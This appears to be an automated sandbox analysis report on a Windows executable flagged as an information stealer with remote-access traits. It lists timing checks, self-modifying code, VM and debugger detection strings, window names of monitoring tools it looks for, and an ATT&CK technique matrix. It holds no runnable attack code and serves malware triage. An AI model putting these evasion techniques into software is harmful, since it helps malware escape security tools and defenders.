                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFEEDF second address: AFEEE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B09C6E second address: B09CDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BF9145137h 0x00000009 pop eax 0x0000000a pushad 0x0000000b jbe 00007F0BF9145126h 0x00000011 jmp 00007F0BF9145131h 0x00000016 popad 0x00000017 jp 00007F0BF914513Fh 0x0000001d jmp 00007F0BF9145139h 0x00000022 popad 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F0BF914512Fh 0x0000002b jl 00007F0BF9145126h 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B09CDB second address: B09CDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B09CDF second address: B09D04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BF9145137h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F0BF9145126h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B09D04 second address: B09D26 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0BF8E3D566h 0x00000008 jnp 00007F0BF8E3D566h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0BF8E3D570h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E26D second address: B0E280 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0BF9145126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jns 00007F0BF9145126h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0DB93 second address: B0DB99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0DB99 second address: B0DBDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF914512Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0BF914512Eh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jnc 00007F0BF9145126h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F0BF9145132h 0x00000024 push esi 0x00000025 pop esi 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0DBDD second address: B0DBEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF8E3D56Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0DD84 second address: B0DD88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B11069 second address: B11089 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jl 00007F0BF8E3D566h 0x0000000d jmp 00007F0BF8E3D572h 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B11089 second address: B11095 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007F0BF9145126h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A416DE second address: A416E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B13B5A second address: B13B60 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B22084 second address: B22088 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B22088 second address: B220A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF914512Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jo 00007F0BF9145126h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B220A0 second address: B220A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B220A6 second address: B220C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BF9145138h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2914B second address: B2914F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2914F second address: B29153 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B296B5 second address: B296BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B296BC second address: B296F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edx 0x00000006 pop edx 0x00000007 jmp 00007F0BF9145136h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F0BF9145132h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B296F0 second address: B296FA instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0BF8E3D566h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2A2FE second address: B2A302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2A302 second address: B2A30D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2EEF5 second address: B2EF05 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0BF9145126h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2EF05 second address: B2EF28 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F0BF8E3D579h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2EF28 second address: B2EF32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0BF9145126h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2EF32 second address: B2EF36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2EBD7 second address: B2EBF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F0BF9145134h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2EBF9 second address: B2EC12 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0BF8E3D566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0BF8E3D56Ch 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3D6F2 second address: B3D6FC instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0BF9145126h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4122D second address: B41257 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF8E3D56Dh 0x00000007 jmp 00007F0BF8E3D575h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41257 second address: B4128B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F0BF914512Bh 0x0000000e push edi 0x0000000f jmp 00007F0BF9145133h 0x00000014 pushad 0x00000015 popad 0x00000016 pop edi 0x00000017 pushad 0x00000018 js 00007F0BF9145126h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4128B second address: B41298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F0BF8E3D56Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3669C second address: B366D1 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0BF9145141h 0x00000008 jmp 00007F0BF914512Eh 0x0000000d jmp 00007F0BF914512Dh 0x00000012 push edi 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 pop edi 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f pop eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B366D1 second address: B366D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B366D5 second address: B366E1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0BF9145126h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B366E1 second address: B366F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0BF8E3D56Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4D8CB second address: B4D8D0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4D8D0 second address: B4D8D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4FF4E second address: B4FF52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6010A second address: B60115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0BF8E3D566h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B60284 second address: B602AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F0BF9145138h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jc 00007F0BF9145126h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B60441 second address: B6046A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BF8E3D579h 0x00000009 jmp 00007F0BF8E3D56Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6046A second address: B60478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnp 00007F0BF9145126h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B60604 second address: B6060A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6060A second address: B6061A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0BF9145128h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6061A second address: B60620 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B60AFA second address: B60B04 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0BF914513Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B60B04 second address: B60B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BF8E3D573h 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0BF8E3D577h 0x00000010 jg 00007F0BF8E3D566h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B60E14 second address: B60E19 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B62BA2 second address: B62BA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B62BA6 second address: B62BAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B65A53 second address: B65A59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B65A59 second address: B65A5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B689B6 second address: B689BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A0394 second address: 51A0399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A856BF second address: A856C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A76984 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A9FE83 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B043C4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006938B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_006938B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00694910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00694910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0068DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0068E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00694570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00694570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0068ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0068BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0068DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006816D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006816D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00693EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00693EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0068F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068F68A FindFirstFileA,0_2_0068F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00681160 GetSystemInfo,ExitProcess,0_2_00681160
                Source: file.exe, file.exe, 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2075749076.00000000013F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2075749076.0000000001403000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2075749076.00000000013D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2075749076.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13599
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13615
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13596
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13650
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13611
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006845C0 VirtualProtect ?,00000004,00000100,000000000_2_006845C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00699860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00699860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00699750 mov eax, dword ptr fs:[00000030h]0_2_00699750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00697850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00697850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5644, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00699600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00699600
                Source: file.exe, file.exe, 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00697B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00696920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00696920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00697850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00697850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00697A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00697A30

                Stealing of Sensitive Information

                Source: Yara matchFile source: 0.2.file.exe.680000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2075749076.000000000138E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2031125996.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5644, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara matchFile source: 0.2.file.exe.680000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2075749076.000000000138E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2031125996.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5644, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                ATT&CK matrix (a leading number marks a technique matched by the analysis signatures):

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | 11 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
